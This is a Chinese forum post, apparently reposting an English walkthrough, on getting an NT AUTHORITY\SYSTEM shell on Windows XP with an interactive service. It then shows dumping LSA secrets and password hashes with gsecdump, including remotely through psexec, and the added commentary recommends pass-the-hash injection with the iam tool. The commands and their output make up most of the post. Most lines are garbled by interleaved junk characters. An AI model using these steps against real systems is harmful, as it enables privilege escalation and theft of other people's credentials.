o get a DOS Prompt as NT system:& V @+ E: n+ o) { k
. Y Z2 q# w5 G5 O8 y( O3 [7 O
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact$ I" c. p' r" S9 x/ F6 n
[SC] CreateService SUCCESS
2 c% d. J) ?- y1 r' N$ \
7 U$ m: i8 s! sC:\>sc start shellcmdline+ f: x2 A) B, P; w4 j
[SC] StartService FAILED 1053:
) W' M1 ?* T# Q+ V, u |' _& p' p6 J6 \! P( z0 J H& k* E# j' g
The service did not respond to the start or control request in a timely fashion.
6 H$ `. T: s8 E, |% V8 o3 H+ k# r+ `3 M" R# L6 F; U
C:\>sc delete shellcmdline
6 F7 m! D& y8 {[SC] DeleteService SUCCESS: ~: B8 P7 j5 `: Y& x" J% _! U
7 h( b% O; X1 O* ]1 z8 M------------
# x3 _ t7 P8 H- ]* ~9 O
5 u7 A/ ?$ s$ v: T5 ZThen in the new DOS window:" t, R& [# P4 c# E5 t5 k/ n
7 y- X& r/ e2 m) n$ Q2 cMicrosoft Windows XP [Version 5.1.2600]$ j0 L6 U" `6 v" Z5 J
(C) Copyright 1985-2001 Microsoft Corp.% M+ X0 y( w( D; E
/ L5 [- I" V5 b5 gC:\WINDOWS\system32>whoami
) r( N. p+ g" i* Q* ^6 B- eNT AUTHORITY\SYSTEM% S+ N& w) [! E& ]! s
4 x, z1 d0 A& o8 I+ ^( ]C:\WINDOWS\system32>gsecdump -h
& G8 G" B5 k) ?4 s1 wgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se) F9 p0 l; i. ~1 N) S3 l$ y
usage: gsecdump [options]5 |- {# h5 y. w9 \) y1 V' E
/ P3 e6 P/ W" L1 g; I9 ?3 _options:) J9 N% \- W$ X4 |
-h [ --help ] show help
" W% p0 A# o" O% X" r9 _% Y-a [ --dump_all ] dump all secrets8 \2 L7 s: k( d0 ~5 B4 m7 P$ l
-l [ --dump_lsa ] dump lsa secrets
$ i8 \) V1 z) Q! a$ \-w [ --dump_wireless ] dump microsoft wireless connections
. [+ W R: x* L- b, B# r-u [ --dump_usedhashes ] dump hashes from active logon sessions
9 h+ @4 n+ C: K: e; Z-s [ --dump_hashes ] dump hashes from SAM/AD. u& _$ N) y3 ~6 g( Y- f: t7 _* h
. ?+ ]$ @9 k: g1 X4 M8 }Although I like to use:+ v! I+ c8 N* y4 M. u
( _0 M$ j! K. I5 H/ {
PsExec v1.83 - Execute processes remotely
- z$ H' A% z3 s, |# X" r* yCopyright (C) 2001-2007 Mark Russinovich" m" g' Q3 j" n3 x6 I' @
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
4 Z6 \ O) C% x/ K4 ?9 V& k% B/ s" z \/ }
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT( {5 |9 @7 J; ~6 q/ e
# f4 R" _6 @% ]to get the hashes from active logon sessions of a remote system.2 l/ u2 k) F2 ]3 q# g
! ^( ?$ h1 k: P1 t0 J0 Z# @" ?
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.; W% o6 f! X; |( S2 O" m
2 S$ w {5 }) D) |) k提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.! c( t' | H( k$ B/ l
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url] I7 W9 D' @# O, v5 j
% e" C+ K5 h: X P/ h
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。1 R0 T, M4 D& V, u. B7 u
|
发表于 2012-11-6 21:09:29
收藏
支持
反对